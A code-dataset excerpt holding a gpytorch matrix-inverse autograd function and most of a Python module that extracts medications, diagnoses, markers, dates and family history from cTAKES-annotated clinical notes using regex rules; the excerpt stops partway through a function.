"cohortextractor.patients.died_from_any_cause", "line_number": 62, "usage_type": "call"}, {"api_name": "cohortextractor.patients", "line_number": 62, "usage_type": "name"}, {"api_name": "cohortextractor.patients.satisfying", "line_number": 67, "usage_type": "call"}, {"api_name": "cohortextractor.patients", "line_number": 67, "usage_type": "name"}, {"api_name": "cohortextractor.patients.registered_as_of", "line_number": 69, "usage_type": "call"}, {"api_name": "cohortextractor.patients", "line_number": 69, "usage_type": "name"}, {"api_name": "cohortextractor.patients.registered_with_one_practice_between", "line_number": 72, "usage_type": "call"}, {"api_name": "cohortextractor.patients", "line_number": 72, "usage_type": "name"}, {"api_name": "cohortextractor.patients.age_as_of", "line_number": 82, "usage_type": "call"}, {"api_name": "cohortextractor.patients", "line_number": 82, "usage_type": "name"}, {"api_name": "cohortextractor.patients.categorised_as", "line_number": 94, "usage_type": "call"}, {"api_name": "cohortextractor.patients", "line_number": 94, "usage_type": "name"}, {"api_name": "cohortextractor.patients.sex", "line_number": 128, "usage_type": "call"}, {"api_name": "cohortextractor.patients", "line_number": 128, "usage_type": "name"}, {"api_name": "cohortextractor.patients.registered_practice_as_of", "line_number": 137, "usage_type": "call"}, {"api_name": "cohortextractor.patients", "line_number": 137, "usage_type": "name"}, {"api_name": "cohortextractor.patients.with_these_clinical_events", "line_number": 147, "usage_type": "call"}, {"api_name": "cohortextractor.patients", "line_number": 147, "usage_type": "name"}, {"api_name": "cohortextractor.patients.with_these_clinical_events", "line_number": 166, "usage_type": "call"}, {"api_name": "cohortextractor.patients", "line_number": 166, "usage_type": "name"}, {"api_name": "cohortextractor.patients.with_these_clinical_events", "line_number": 185, "usage_type": "call"}, {"api_name": "cohortextractor.patients", "line_number": 185, "usage_type": "name"}, {"api_name": "cohortextractor.Measure", "line_number": 214, "usage_type": "call"}]} +{"seq_id": "109372260", "text": "import torch\nfrom torch.autograd import Function\nfrom gpytorch.utils import LinearCG\n\n\n# Returns input_1^{-1} input_2\nclass Invmm(Function):\n def forward(self, matrix, input_2):\n res = LinearCG().solve(matrix, input_2)\n if res.ndimension() == 1:\n res.unsqueeze_(1)\n self.save_for_backward(matrix, input_2, res)\n return res\n\n def backward(self, grad_output):\n matrix, input_2, input_1_t_input_2 = self.saved_tensors\n grad_input_1 = None\n grad_input_2 = None\n\n # input_1 gradient\n if self.needs_input_grad[0]:\n grad_input_1 = torch.mm(grad_output, input_1_t_input_2.t())\n grad_input_1 = LinearCG().solve(matrix, grad_input_1)\n grad_input_1 = grad_input_1.mul_(-1)\n\n # input_2 gradient\n if self.needs_input_grad[1]:\n grad_input_2 = LinearCG().solve(matrix, grad_output)\n\n return grad_input_1, grad_input_2\n\n def __call__(self, input_1_var, input_2_var):\n res = super(Invmm, self).__call__(input_1_var, input_2_var)\n return res\n", "sub_path": "gpytorch/math/functions/invmm.py", "file_name": "invmm.py", "file_ext": "py", "file_size_in_byte": 1086, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "torch.autograd.Function", "line_number": 7, "usage_type": "name"}, {"api_name": "gpytorch.utils.LinearCG", "line_number": 9, "usage_type": "call"}, {"api_name": "torch.mm", "line_number": 22, "usage_type": "call"}, {"api_name": "gpytorch.utils.LinearCG", "line_number": 23, "usage_type": "call"}, {"api_name": "gpytorch.utils.LinearCG", "line_number": 28, "usage_type": "call"}]} +{"seq_id": "426019954", "text": "import xml.etree.cElementTree as ET\nimport pprint\nimport os\nimport re\nimport pyConTextNLP.pyConTextGraph as pyConText\nimport pyConTextNLP.itemData as itemData\nimport urllib.request\nimport networkx as nx\nfrom textblob import TextBlob\nimport pyConTextNLP.display.html as html\nfrom IPython.display import display, HTML\n\n# weired cTakes diseases recognitions to be exclude\nEXCLUDE_DISEASE_REGEX = [\n re.compile(r'^[\\W]*disease[\\W]*$',re.IGNORECASE),\n re.compile(r'^[\\W]*all[\\W]*$',re.IGNORECASE),\n re.compile(r'^[\\W]*plan[\\W]*$',re.IGNORECASE)\n ]\n\n# treatment not meaningful, need to be excluded\n# TODO: need to combine procedures before exclude any!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\nEXCLUDE_TREATMENT_REGEX = [\n re.compile(r'^\\s*support\\s*$',re.IGNORECASE),\n re.compile(r'^\\s*treatment\\s*$',re.IGNORECASE),\n re.compile(r'^\\s*replacement\\s*$',re.IGNORECASE),\n re.compile(r'^\\s*therapy\\s*$',re.IGNORECASE),\n re.compile(r'^\\s*surgical\\s*$',re.IGNORECASE)\n ]\n\n# regex's for gender determination\nMALE_REGEX = [\n re.compile(r'\\bhe\\b',re.IGNORECASE),\n re.compile(r'\\bhis\\b',re.IGNORECASE),\n re.compile(r'\\bmr\\b',re.IGNORECASE),\n re.compile(r'\\bmale\\b',re.IGNORECASE),\n re.compile(r'\\bhim\\b',re.IGNORECASE),\n re.compile(r'\\bman\\b',re.IGNORECASE),\n re.compile(r'\\bgentleman\\b',re.IGNORECASE),\n re.compile(r'\\bsir\\b',re.IGNORECASE)\n ]\nFEMALE_REGEX = [\n re.compile(r'\\bshe\\b',re.IGNORECASE),\n re.compile(r'\\bher\\b',re.IGNORECASE),\n re.compile(r'\\bms\\b',re.IGNORECASE),\n re.compile(r'\\bmiss\\b',re.IGNORECASE),\n re.compile(r'\\bmizz\\b',re.IGNORECASE),\n re.compile(r'\\bhers\\b',re.IGNORECASE),\n re.compile(r'\\bfemale\\b',re.IGNORECASE),\n re.compile(r'\\bwoman\\b',re.IGNORECASE),\n re.compile(r'\\blady\\b',re.IGNORECASE),\n re.compile(r'\\bmadam\\b',re.IGNORECASE),\n re.compile(r'\\bmadame\\b',re.IGNORECASE)\n ]\n\n# smoking status regex\nSMOKING_REGEX = [\n re.compile(r'\\bsmoke\\b',re.IGNORECASE),\n re.compile(r'\\bsmokes\\b',re.IGNORECASE),\n re.compile(r'\\bsmoked\\b',re.IGNORECASE),\n re.compile(r'\\bsmoking\\b',re.IGNORECASE),\n re.compile(r'\\bcigar\\b',re.IGNORECASE),\n re.compile(r'\\bcigarattes\\b',re.IGNORECASE),\n re.compile(r'\\bcigaratte\\b',re.IGNORECASE),\n re.compile(r'\\bcig\\b',re.IGNORECASE),\n re.compile(r'\\bcigs\\b',re.IGNORECASE),\n re.compile(r'\\bcigars\\b',re.IGNORECASE),\n re.compile(r'\\btob\\b',re.IGNORECASE),\n re.compile(r'\\btobacco\\b',re.IGNORECASE),\n re.compile(r'\\btobaccos\\b',re.IGNORECASE),\n re.compile(r'\\bnicotine\\b',re.IGNORECASE)\n ]\n\n# drinking status regex\nDRINKING_REGEX = [\n re.compile(r'\\bdrink\\b',re.IGNORECASE),\n re.compile(r'\\bdrinks\\b',re.IGNORECASE),\n re.compile(r'\\bdrinking\\b',re.IGNORECASE),\n re.compile(r'\\bdrank\\b',re.IGNORECASE),\n re.compile(r'\\bdrunk\\b',re.IGNORECASE),\n re.compile(r'\\balcohol\\b',re.IGNORECASE),\n re.compile(r'\\balcoholic\\b',re.IGNORECASE)\n ]\n\n# exclude weired medications\nEXCLUDE_MEDICATION_REGEX = [\n re.compile(r'^\\s*chicken\\s*$',re.IGNORECASE),\n re.compile(r'^\\s*basis\\s*$',re.IGNORECASE),\n re.compile(r'^\\s*today\\s*$',re.IGNORECASE),\n re.compile(r'^\\s*his\\s*$',re.IGNORECASE),\n re.compile(r'^\\s*program\\s*$',re.IGNORECASE),\n re.compile(r'^\\s*active\\s*$',re.IGNORECASE)\n ]\n# add more marker patterns\n# MARKER_REGEX = [\n# re.compile(r'\\bcd[\\d]+\\b',re.IGNORECASE),\n# re.compile(r'\\bzap-*[\\d]+\\b',re.IGNORECASE)\n# ]\nMARKER_REGEX = [\n re.compile(r'\\bcd[\\d]+[a-zA-Z]*[-%s]*[\\s.,;]',re.IGNORECASE),\n re.compile(r'\\bzap-*[\\d]+[a-zA-Z]*[-%s]*[\\s.,;]',re.IGNORECASE)\n ]\n\nMARKER_RESULT_REGEX = [\n re.compile(r'\\bpositive\\b',re.IGNORECASE),\n re.compile(r'\\bnegative\\b',re.IGNORECASE)\n ]\n\n# TODO: populate family member regex lists and plurals\nFAMILY_REGEX = [\n re.compile(r'\\bbrothers*',re.IGNORECASE),\n re.compile(r'\\bsisters*', re.IGNORECASE),\n re.compile(r'\\bfather\\b', re.IGNORECASE),\n re.compile(r'\\bmother\\b', re.IGNORECASE),\n re.compile(r'\\bsons*\\b', re.IGNORECASE),\n re.compile(r'\\bdaughters*\\b', re.IGNORECASE),\n re.compile(r'\\bchildren\\b', re.IGNORECASE),\n re.compile(r'\\bchild\\b', re.IGNORECASE),\n re.compile(r'\\bnephew\\b', re.IGNORECASE),\n re.compile(r'\\bgrandfathers*\\b', re.IGNORECASE),\n re.compile(r'\\bgrandmothers*\\b', re.IGNORECASE)\n ]\n\n# weigh, weighs, weighed and weighing are all included\nWEIGHT_REGEX = [\n re.compile(r'\\bweigh',re.IGNORECASE)\n ]\n\nWEIGHT_UNIT_REGEX = [\n re.compile(r'\\bkg\\b',re.IGNORECASE),\n re.compile(r'\\bpound\\b', re.IGNORECASE),\n re.compile(r'\\bpounds\\b', re.IGNORECASE),\n re.compile(r'\\blb\\b', re.IGNORECASE),\n re.compile(r'\\blbs\\b', re.IGNORECASE)\n ]\n\nHEIGHT_REGEX = [\n re.compile(r'\\bheight\\b',re.IGNORECASE),\n re.compile(r'\\btall\\b', re.IGNORECASE)\n ]\n\nHEIGHT_UNIT_REGEX = [\n re.compile(r'\\bcm\\b',re.IGNORECASE),\n re.compile(r'\\bm\\b', re.IGNORECASE),\n re.compile(r'\\bfeet\\b', re.IGNORECASE),\n re.compile(r'\\bft\\b', re.IGNORECASE),\n re.compile(r'\\bft.\\b', re.IGNORECASE),\n re.compile(r'\\binches\\b', re.IGNORECASE)\n ]\n\nMEASUREMENT_REGEX = [\n re.compile(r'[-.\\d]+ \\bunits\\b',re.IGNORECASE),\n re.compile(r'[-.\\d]+ \\btablets\\b', re.IGNORECASE),\n re.compile(r'\\bsliding scale\\b', re.IGNORECASE),\n re.compile(r'[-.\\d]+ \\btab\\b', re.IGNORECASE),\n re.compile(r'[-.\\d]+ \\bmeq\\b', re.IGNORECASE)\n ]\n\nPERCENT_REGEX = re.compile(r'[-.\\d]+\\s*%',re.IGNORECASE)\n\nMONTH_REGEX = [\n re.compile(r'january',re.IGNORECASE),\n re.compile(r'february', re.IGNORECASE),\n re.compile(r'march', re.IGNORECASE),\n re.compile(r'april', re.IGNORECASE),\n re.compile(r'may', re.IGNORECASE),\n re.compile(r'june', re.IGNORECASE),\n re.compile(r'july', re.IGNORECASE),\n re.compile(r'august', re.IGNORECASE),\n re.compile(r'september', re.IGNORECASE),\n re.compile(r'october', re.IGNORECASE),\n re.compile(r'november', re.IGNORECASE),\n re.compile(r'december', re.IGNORECASE),\n re.compile(r'\\bjan\\b',re.IGNORECASE),\n re.compile(r'\\bfeb\\b', re.IGNORECASE),\n re.compile(r'\\bmar\\b', re.IGNORECASE),\n re.compile(r'\\bapr\\b', re.IGNORECASE),\n re.compile(r'\\bmay\\b', re.IGNORECASE),\n re.compile(r'\\bjun\\b', re.IGNORECASE),\n re.compile(r'\\bjul\\b', re.IGNORECASE),\n re.compile(r'\\baug\\b', re.IGNORECASE),\n re.compile(r'\\bsep\\b', re.IGNORECASE),\n re.compile(r'\\boct\\b', re.IGNORECASE),\n re.compile(r'\\bnov\\b', re.IGNORECASE),\n re.compile(r'\\bdec\\b', re.IGNORECASE)\n ]\n\n# pick out all entities needed\n# TODO: romans contain weird mentions\ndef travelTrough(filename, textname):\n xml_file = open(filename, \"r\")\n textfile = open(textname, \"r\").read()\n\n # entities interested\n medications = []\n sentences = []\n measurements = []\n predicates = []\n diseases = []\n dates = []\n semantics = []\n numbers = []\n nps = []\n procedures = []\n romans = []\n\n # XML tags for the interested entities\n medication_tag = \"org.apache.ctakes.typesystem.type.textsem.MedicationMention\"\n measurement_tag = \"org.apache.ctakes.typesystem.type.textsem.MeasurementAnnotation\"\n sentence_tag = \"org.apache.ctakes.typesystem.type.textspan.Sentence\"\n predicate_tag = \"org.apache.ctakes.typesystem.type.textsem.Predicate\"\n disease_tag = \"org.apache.ctakes.typesystem.type.textsem.DiseaseDisorderMention\"\n semantic_tag = \"org.apache.ctakes.typesystem.type.textsem.SemanticArgument\"\n date_tag = \"org.apache.ctakes.typesystem.type.textsem.DateAnnotation\"\n number_tag = \"org.apache.ctakes.typesystem.type.syntax.NumToken\"\n np_tag = \"org.apache.ctakes.typesystem.type.syntax.NP\"\n procedure_tag = \"org.apache.ctakes.typesystem.type.textsem.ProcedureMention\"\n roman_tag = \"org.apache.ctakes.typesystem.type.textsem.RomanNumeralAnnotation\"\n\n for event, elem in ET.iterparse(xml_file, events=(\"start\",)):\n # populate the entities\n findEntity(medications, elem, textfile, medication_tag, \"medication\", \"by_position\")\n findEntity(measurements, elem, textfile, measurement_tag, \"measurement\", \"by_position\")\n findEntity(sentences, elem, textfile, sentence_tag, \"sentence\", \"by_position\")\n findEntity(predicates, elem, textfile, predicate_tag, \"predicate\", \"frameSet\")\n findEntity(diseases, elem, textfile, disease_tag, \"disease\", \"by_position\", \"polarity\")\n findEntity(semantics, elem, textfile, semantic_tag, \"semantic\", \"by_position\", \"label\")\n findEntity(dates, elem, textfile, date_tag, \"date\", \"by_position\")\n findEntity(numbers, elem, textfile, number_tag, \"number\", \"by_position\")\n findEntity(nps, elem, textfile, np_tag, \"np\", \"by_position\")\n findEntity(procedures, elem, textfile, procedure_tag, \"procedure\", \"by_position\")\n findEntity(romans, elem, textfile, roman_tag, \"roman\", \"by_position\")\n\n # find doses missed by cTakes\n findOtherMeasurements(textfile, measurements)\n\n # exclude weird disease recognitions by cTakes\n tmp_diseases = []\n for disease in diseases:\n if_exclude = False\n for r in EXCLUDE_DISEASE_REGEX:\n m = r.search(disease[\"content\"])\n if m != None:\n if_exclude = True\n break\n if not if_exclude: tmp_diseases.append(disease)\n diseases = tmp_diseases\n\n # exclude weird procedures recognitions by cTakes\n tmp_procedures = []\n for procedure in procedures:\n if_exclude = False\n for r in EXCLUDE_TREATMENT_REGEX:\n m = r.search(procedure[\"content\"])\n if m != None:\n if_exclude = True\n break\n if not if_exclude: tmp_procedures.append(procedure)\n procedures = tmp_procedures\n\n # exclude weird medication recognitions by cTakes\n tmp_medications = []\n for medication in medications:\n if_exclude = False\n for r in EXCLUDE_MEDICATION_REGEX:\n m = r.search(medication[\"content\"])\n if m != None:\n if_exclude = True\n break\n if not if_exclude: tmp_medications.append(medication)\n medications = tmp_medications\n\n xml_file.close()\n return medications, sentences, measurements, predicates, diseases, semantics, dates, numbers, nps, procedures, romans\n\n# find specific type of entities\n# *otherAttributes are information other than beg, end, content and type\n# argument list:\n# entities: list of entities to populate\n# elem: the XML element\n# textfile: the original text file\n# entity_tag: the XML tag for the interested entities\n# type: the attribute specifying the type of the entity\n# contentTag: the content information for the entity\n# if contentTag is \"by_position\", use the string bounded by begin and end positions\n# if contentTag is \"ATTRIBUTE_NAME\", use the corresponding attribute value of the XML element\n# *otherAttributes: (optional) other attribute values of the XML element needed\ndef findEntity(entities, elem, textfile, entity_tag, type, contentTag, *otherAttributes):\n attrb_list = [attr for attr in otherAttributes]\n\n if elem.tag == entity_tag:\n item = {}\n beg = int(elem.attrib[\"begin\"])\n end = int(elem.attrib[\"end\"])\n\n if contentTag == \"by_position\":\n content = textfile[int(elem.attrib[\"begin\"]):int(elem.attrib[\"end\"])]\n else:\n content = elem.attrib[contentTag]\n item[\"beg\"] = beg\n item[\"end\"] = end\n item[\"content\"] = content\n item[\"type\"] = type\n\n for attrb in attrb_list:\n item[attrb] = elem.attrib[attrb]\n\n entities.append(item)\n\ndef determineGender(text):\n male_vote = 0\n female_vote = 0\n\n # count male related mentions\n for r in MALE_REGEX:\n all = r.findall(text)\n male_vote += len(all)\n\n # count female related mentions\n for r in FEMALE_REGEX:\n all = r.findall(text)\n female_vote += len(all)\n\n if male_vote > female_vote:\n return \"male\"\n elif male_vote < female_vote:\n return \"female\"\n else:\n return \"Undetermined\"\n\n\n# find marker mentions\ndef findMarkers(text, sentences):\n markers = {}\n\n for r in MARKER_REGEX:\n iters = r.finditer(text)\n for it in iters:\n beg = it.span()[0]\n end = it.span()[1]\n sen_id = findSentenceNumber(beg, end, sentences)\n\n item = {}\n item[\"beg\"] = beg\n item[\"end\"] = end\n item[\"type\"] = \"marker\"\n item[\"content\"] = it.group().strip().strip(\".,;\")\n item[\"sen_id\"] = sen_id\n\n markers[beg] = item\n\n return markers\n\n# find marker results\ndef findMarkerResults(text, sentences):\n results = {}\n\n for r in MARKER_RESULT_REGEX:\n iters = r.finditer(text)\n for it in iters:\n beg = it.span()[0]\n end = it.span()[1]\n sen_id = findSentenceNumber(beg, end, sentences)\n\n item = {}\n item[\"beg\"] = beg\n item[\"end\"] = end\n item[\"type\"] = \"marker result\"\n item[\"content\"] = it.group()\n item[\"sen_id\"] = sen_id\n\n results[beg] = item\n\n return results\n\n# find other measurements not recognized by cTakes, such as \"1 tab\", \"1 tabulet\"\n# list of the regex for such measurements are given in the global MEASUREMENT_REGEX\ndef findOtherMeasurements(text, measurements):\n for r in MEASUREMENT_REGEX:\n iters = r.finditer(text)\n for iter in iters:\n item = {}\n item[\"beg\"] = iter.span()[0]\n item[\"end\"] = iter.span()[1]\n item[\"content\"] = iter.group()\n item[\"type\"] = \"measurement\"\n measurements.append(item)\n\n# find other dates not recognized by cTakes, such as \"December, 21 2009\"\ndef findOtherDates(text, dates, numbers, sentences):\n for r in MONTH_REGEX:\n # find if there is any month mentioned in the whole text\n iters = r.finditer(text)\n for iter in iters:\n if iter.span()[0] not in dates:\n month = text[iter.span()[0] : iter.span()[1]]\n month_sen_id = findSentenceNumber(iter.span()[0], iter.span()[1], sentences)\n date_end_position = iter.span()[1]\n # find the year of the date\n nums = []\n for num_key in numbers:\n num_sen_id = numbers[num_key][\"sen_id\"]\n\n # TODO: take care of two digits year\n # TODO: take care of year before month\n # TODO: take care of year only\n num_beg = numbers[num_key][\"beg\"]\n num_end = numbers[num_key][\"end\"]\n num_len = num_end - num_beg\n if num_sen_id == month_sen_id and num_len == 4:\n if num_beg >= iter.span()[1]: nums.append(num_key)\n\n if len(nums) != 0:\n date_end_position = numbers[nums[0]][\"end\"]\n\n # append the date item\n item = {}\n beg = iter.span()[0]\n end = numbers[nums[0]][\"end\"]\n content = text[beg : end]\n sen_id = month_sen_id\n\n item[\"beg\"] = beg\n item[\"end\"] = end\n item[\"content\"] = content\n item[\"type\"] = \"date\"\n item[\"sen_id\"] = sen_id\n\n dates[beg] = item\n\n# find percentages\ndef findPercentage(text, sentences):\n percentages = {}\n iters = PERCENT_REGEX.finditer(text)\n for it in iters:\n item = {}\n item[\"beg\"] = it.span()[0]\n item[\"end\"] = it.span()[1]\n item[\"content\"] = it.group()\n item[\"type\"] = \"percentage\"\n item[\"sen_id\"] = findSentenceNumber(item[\"beg\"], item[\"end\"], sentences)\n percentages[item[\"beg\"]] = item\n\n return percentages\n\n\n# TODO: Make sure sentences are in correct order\ndef addSentenceNumber_new(sentences, entities, *args):\n list_of_entities = [entities]\n for arg in args:\n list_of_entities.append(arg)\n for ents in list_of_entities:\n for entity in ents:\n for sen_ind, sentence in enumerate(sentences):\n if entity[\"beg\"] >= sentence[\"beg\"] and entity[\"end\"] <= sentence[\"end\"]:\n entity[\"sen_id\"] = sen_ind\n\n# TODO: Make sure sentences are in correct order\ndef findSentenceNumber(beg, end, sentences):\n ind = -1\n for sen_ind, sentence in enumerate(sentences):\n if beg >= sentence[\"beg\"] and end <= sentence[\"end\"]:\n ind = sen_ind\n break\n return ind\n\n# combine the entities input to the function into a dictionary\n# the key is the begining postition\ndef indexEntities(entities, *args):\n ret_entites = {}\n original_entities = [entities]\n\n for arg in args: original_entities.append(arg)\n\n for ents in original_entities:\n for entity in ents:\n ret_entites[entity[\"beg\"]] = entity\n\n return ret_entites\n\n# combine entities that has been indexed with beg position\ndef combineIndexedEntities(entities_1, entities_2):\n combined = {}\n for key in entities_1:\n combined[key] = entities_1[key]\n for key in entities_2:\n combined[key] = entities_2[key]\n return combined\n\n# TODO: clean the code for this function!\ndef catEntities(combinedentities, txtfname):\n textfile = open(txtfname, \"r\").read()\n\n newentities = {}\n entity_keys = list(combinedentities.keys())\n entity_keys.sort()\n sz = len(entity_keys)\n\n # determine if there is a need to close the parentheses\n need_to_close = False\n # determine if the the two are the same\n previous_same = False\n previous_ind = 0\n # keep track of the position covered\n covered_position = 0\n\n for i in range(sz):\n cur_type = combinedentities[entity_keys[i]][\"type\"]\n cur_beg = combinedentities[entity_keys[i]][\"beg\"]\n cur_end = combinedentities[entity_keys[i]][\"end\"]\n\n\n if i < sz - 1:\n next_type = combinedentities[entity_keys[i + 1]][\"type\"]\n next_beg = combinedentities[entity_keys[i + 1]][\"beg\"]\n next_end = combinedentities[entity_keys[i + 1]][\"end\"]\n if cur_type == \"medication\" and next_type == \"medication\" and (next_beg - cur_end) < 4:\n\n # regex for determining if two adjacent medications are the same\n seperated_medication = re.compile(r'[^ (]',re.IGNORECASE)\n m = seperated_medication.search(textfile[cur_end : next_beg])\n\n # regex for determining if there is a left parentheses between two medications\n contains_left_parentheses = re.compile(r'\\(')\n m1 = contains_left_parentheses.search(textfile[cur_end : next_beg])\n\n contains_right_parentheses = re.compile(r'\\)')\n\n # if the same medications, combine them\n if m == None:\n # if the previous two are also the same, no need to create a new entry in newentities\n # only do the combining\n if previous_same:\n # for closing parentheses\n if m1 != None:\n m2 = contains_right_parentheses.search(textfile[newentities[previous_ind]['beg'] : ])\n end = m2.start() + newentities[previous_ind]['beg'] + 1\n else:\n m3 = contains_left_parentheses.search(textfile[cur_end : ])\n m4 = contains_right_parentheses.search(textfile[cur_end : ])\n if (m3 == None and m4 != None) or (m4 != None and m4 != None and m3.start() > m4.start()):\n end = m4.start() + cur_end + 1\n else:\n end = next_end\n\n newentities[previous_ind]['content'] = textfile[newentities[previous_ind]['beg'] : end]\n newentities[previous_ind]['end'] = end\n covered_position = end\n\n else:\n # for closing parentheses\n if m1 != None:\n m2 = contains_right_parentheses.search(textfile[cur_beg : ])\n end = m2.start() + cur_beg + 1\n else:\n end = next_end\n\n newentities[cur_beg] = combinedentities[cur_beg]\n newentities[cur_beg]['content'] = textfile[cur_beg : end]\n newentities[cur_beg]['end'] = end\n previous_same = True\n previous_ind = cur_beg\n covered_position = end\n\n # if not the same, add the entity to newentities, set previous_same to False\n else:\n if cur_beg >= covered_position:\n newentities[cur_beg] = combinedentities[cur_beg]\n covered_position = cur_end\n previous_same = False\n else:\n if cur_beg >= covered_position:\n newentities[cur_beg] = combinedentities[cur_beg]\n covered_position = cur_end\n previous_same = False\n elif cur_beg >= covered_position and not previous_same:\n newentities[cur_beg] = combinedentities[cur_beg]\n\n return newentities\n\n# find headlines such as \"IDENTIFICATION:\"\ndef findHeads(sentences, text):\n heads = {}\n tmp_heads = []\n for id, sentence in enumerate(sentences):\n previous_char = text[sentence[\"beg\"] - 1 : sentence[\"beg\"]]\n last_char = text[sentence[\"end\"] - 1 : sentence[\"end\"]]\n if (sentence[\"beg\"] == 0 or previous_char == '\\n') and last_char == ':':\n tmp_heads.append([sentence[\"content\"].strip(\":\").lower(), sentence[\"beg\"]])\n\n for i, head in enumerate(tmp_heads):\n heads[head[0]] = [head[1], len(text) if i == len(tmp_heads) - 1 else tmp_heads[i + 1][1]]\n\n return heads\n\n# picks only entities within a certain section\ndef getEntitiesInSection(entities, heads={}, section=\"\"):\n entities_in = {}\n\n if bool(heads) and section != \"\":\n section_beg = heads[section][0]\n section_end = heads[section][1]\n\n for key in entities:\n entity_beg = entities[key][\"beg\"]\n entity_end = entities[key][\"end\"]\n if entity_beg >= section_beg and entity_end <= section_end:\n entities_in[key] = entities[key]\n else:\n entities_in = entities.copy()\n\n return entities_in\n\n# loop through all the noun phrases to find family member mentions\ndef findRelatives(nps, textfile, heads={}, section=\"\"):\n nps_in = getEntitiesInSection(nps, heads=heads, section=section)\n\n relatives = {}\n for key in nps_in:\n np_beg = nps_in[key][\"beg\"]\n np_end = nps_in[key][\"end\"]\n for r in FAMILY_REGEX:\n m = r.search(nps_in[key][\"content\"])\n if m != None:\n item = nps_in[key]\n item[\"beg\"] = m.span()[0] + np_beg\n item[\"end\"] = m.span()[1] + np_beg\n item[\"content\"] = m.group(0)\n item[\"type\"] = \"relative\"\n relatives[item[\"beg\"]] = item\n return relatives\n\n# find any two types of entities: primary and secondary.\n# all primary entities will be matched, adding \"Unknown\" if no secondary entities can be matched with.\ndef findmatch(combinedentities, sentence_threshold, primary, secondary):\n already_picked = set()\n matches = {}\n entity_keys = list(combinedentities.keys())\n entity_keys.sort()\n sz = len(entity_keys)\n\n for i in range(sz):\n ind = entity_keys[i]\n type = combinedentities[ind][\"type\"]\n sen_id = combinedentities[ind][\"sen_id\"]\n\n if type == primary:\n\n already_picked.add(ind)\n if i < sz - 1:\n next_ind = entity_keys[i + 1]\n next_type = combinedentities[next_ind][\"type\"]\n next_sen_id = combinedentities[next_ind][\"sen_id\"]\n if next_type == secondary and (next_sen_id - sen_id) <= sentence_threshold:\n matches[ind] = next_ind\n already_picked.add(next_ind)\n elif i > 0:\n prev_ind = entity_keys[i - 1]\n prev_type = combinedentities[prev_ind][\"type\"]\n prev_sen_id = combinedentities[prev_ind][\"sen_id\"]\n if (not (prev_ind in already_picked)) and prev_type == secondary and (sen_id - prev_sen_id) <= sentence_threshold:\n matches[ind] = prev_ind\n already_picked.add(prev_ind)\n else: matches[ind] = -1\n else:\n matches[ind] = -1\n else:\n prev_ind = entity_keys[i - 1]\n prev_type = combinedentities[prev_ind][\"type\"]\n prev_sen_id = combinedentities[prev_ind][\"sen_id\"]\n if (not (prev_ind in already_picked)) and prev_type == secondary and (sen_id - prev_sen_id) <= sentence_threshold:\n matches[ind] = prev_ind\n already_picked.add(prev_ind)\n else: matches[ind] = -1\n\n return matches\n\ndef matchDiagnose(diseases, dates, semantics, predicates, text, heads={}, section=\"\"):\n diseases_in = getEntitiesInSection(diseases, heads=heads, section=section)\n dates_in = getEntitiesInSection(dates, heads=heads, section=section)\n\n # TODO: implement more sofisticated negation rules\n # TODO: more sofisticated match\n combined = combineIndexedEntities(diseases_in, dates_in)\n\n diagnoses_match = findmatch(combined, 1, \"disease\",\"date\")\n match_output = []\n for key in diagnoses_match:\n diag_item = {}\n diag_item[\"disease\"] = diseases_in[key][\"content\"]\n diag_item[\"diagnosed\"] = \"No\" if diseases_in[key][\"polarity\"] == \"-1\" else \"Yes\"\n diag_item[\"date\"] = \"Unknown\" if diagnoses_match[key] not in dates_in else dates_in[diagnoses_match[key]][\"content\"]\n match_output.append(diag_item)\n\n return match_output\n\n# TODO: refactor this and matchDiagnose\n# TODO: amox/clav is partially recognized as amox\ndef matchMedication(medication_and_measurement, text, heads={}, section=\"\"):\n entities_in = getEntitiesInSection(medication_and_measurement, heads=heads, section=section)\n\n medication_match = findmatch(entities_in, 1, \"medication\",\"measurement\")\n match_output = []\n for key in medication_match:\n item = {}\n item[\"medication\"] = entities_in[key][\"content\"]\n item[\"dose\"] = \"Unknown\" if medication_match[key] not in entities_in else entities_in[medication_match[key]][\"content\"]\n match_output.append(item)\n\n return match_output\n\n# match percentages with the correct marker mentions (maker name + positive/negative + percentage)\ndef matchPercentage(percentages, markers, results, heads={}, section=\"\"):\n markers_in = getEntitiesInSection(markers, heads=heads, section=section)\n results_in = getEntitiesInSection(results, heads=heads, section=section)\n percentages_in = getEntitiesInSection(percentages, heads=heads, section=section)\n\n percentages_and_results = combineIndexedEntities(percentages_in, results_in)\n per_re_match = findmatch(percentages_and_results, 1, \"percentage\", \"marker result\")\n\n for key in per_re_match:\n if per_re_match[key] != -1:\n results_in[per_re_match[key]][\"content\"] = percentages_in[key][\"content\"] + \" \" + results_in[per_re_match[key]][\"content\"]\n\n # TODO: more strict relation matches\n combined = combineIndexedEntities(markers_in, results_in)\n matches = findmatch(combined, 1, \"marker\", \"marker result\")\n\n match_output = []\n keys = [k for k in matches]\n keys.sort()\n for key in keys:\n item = {}\n item[\"marker\"] = combined[key][\"content\"]\n item[\"result\"] = \"Unknown\" if matches[key] == -1 else combined[matches[key]][\"content\"]\n match_output.append(item)\n\n return match_output\n\n# TODO: miss oral fludarabine therapy. fludarabine is a medication mention and therapy is a procedure mention.\ndef matchProcedure(procedure_and_date, text, heads={}, section=\"\"):\n entities_in = getEntitiesInSection(procedure_and_date, heads=heads, section=section)\n\n procedure_match = findmatch(entities_in, 1, \"procedure\",\"date\")\n match_output = []\n for key in procedure_match:\n item = {}\n item[\"procedure\"] = entities_in[key][\"content\"]\n item[\"date\"] = \"Unknown\" if procedure_match[key] not in entities_in else entities_in[procedure_match[key]][\"content\"]\n match_output.append(item)\n\n return match_output\n\n# TODO: refactor this and matchDiagnose\n# TODO: details for how many members when plural\n# TODO: More complicated negations\ndef matchFamilyHistory(relatives, diseases, textfile, heads={}, section=\"\"):\n diseases_in = getEntitiesInSection(diseases, heads=heads, section=section)\n relatives_in = getEntitiesInSection(relatives, heads=heads, section=section)\n\n combined = combineIndexedEntities(relatives_in, diseases_in)\n\n history_match = findmatch(combined, 1, \"relative\",\"disease\")\n\n match_output = []\n for key in history_match:\n if history_match[key] in diseases_in:\n item = {}\n item[\"member\"] = relatives_in[key][\"content\"]\n item[\"disease\"] = diseases_in[history_match[key]][\"content\"]\n\n # TODO: negations\n negation = re.compile(r'\\bnot*\\b')\n\n negation_beg = min(relatives_in[key][\"beg\"], diseases_in[history_match[key]][\"beg\"])\n negation_end = max(relatives_in[key][\"end\"], diseases_in[history_match[key]][\"end\"])\n str = 